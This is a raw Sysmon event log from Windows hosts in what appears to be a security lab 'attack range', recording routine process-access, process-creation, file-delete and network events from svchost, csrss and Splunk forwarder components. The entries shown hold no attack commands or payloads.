11:27:49.671{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223320Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:49.671{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223319Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:49.671{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223318Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:49.671{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223317Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:49.671{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223316Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:49.671{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223315Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:49.671{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223314Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:49.671{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223313Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:49.671{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-1A35-6216-6105-000000003902}1316C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000223312Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:49.671{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1A35-6216-6105-000000003902}1316C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000223311Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:49.671{4F8D34B0-1A35-6216-6105-000000003902}1316C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000223310Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:49.186{4F8D34B0-1A35-6216-6005-000000003902}17602500C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000223309Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:49.139{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=222C40E953BBF320B65B66104684C0B6,SHA256=C69224342D74FB0DB83FA492B3AA7E32049F3EB597B58FDDF907DEDCE0204524,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000299433Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:46.716{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49615-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000223308Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:48.999{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1A35-6216-6005-000000003902}1760C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223307Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:48.999{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223306Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:48.999{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223305Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:48.999{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223304Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:48.999{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223303Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:48.999{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223302Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:48.999{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223301Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:48.999{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223300Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:48.999{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223299Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:48.999{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223298Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:48.999{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-1A35-6216-6005-000000003902}1760C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000223297Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:48.999{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1A35-6216-6005-000000003902}1760C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000223296Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:49.000{4F8D34B0-1A35-6216-6005-000000003902}1760C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000299435Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:50.284{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 